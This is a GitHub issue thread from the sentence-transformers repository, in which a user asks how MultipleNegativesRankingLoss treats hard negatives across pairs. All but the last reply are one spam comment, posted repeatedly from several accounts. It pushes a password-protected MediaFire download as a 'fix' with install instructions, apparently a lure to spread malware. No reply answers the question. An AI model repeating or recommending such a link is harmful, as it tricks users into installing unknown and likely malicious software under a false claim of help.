### ISSUE TITLE
question: MultipleNegativesRankingLoss with hard negatives - documentation 

### ISSUE THREAD

**Issue by maayansharon10** [UKPLab/sentence-transformers#2913]
Hello

For information retrieval purposes, I’m trying to train a `all-mpnet-base-v2` with `InformationRetrievalEvaluator` and `MultipleNegativesRankingLoss` as recommended for this case.

In the [documentation](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativessymmetricrankingloss) it says - 
“You can also provide one or multiple hard negatives per anchor-positive pair by structuring the data like this: `(a_1, p_1, n_1), (a_2, p_2, n_2)`. Then, `n_1` is a hard negative for `(a_1, p_1)`. The loss will use for the pair `(a_i, p_i)` all `p_j` for `j != i` and all `n_j` as negatives. “

I don’t understand the 2nd line - 
Given  `(a_1, p_1, n_1),(a_2, p_2, n_2), (a_3, p_3, n_3)`
So for the pair `(a_1, p_1)` the loss would create the following negatives -
-  A hard negative : `(a_1, n_1)` 
- P_j for all i != 1 : `(a_1, p_2), (a_1, p_3)`
- All n_j : `(a_1, n_2), (a_1, n_3)`

So if I understand correctly, any negative example for a given pair, will be used as a negative example for all possible pairs by the loss function? 

What if `n_2` is a hard negative for `a_2` but not for `a_1`? in practice it seems like we provide a list of hard negatives for all anchors, rather than for a single pair. 

Would appreciate if you could clarify if I understand correctly the documentation, and if not, where's my mistake.

Thank you

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by maayansharon10** [comment]
Thank you for the detailed response!
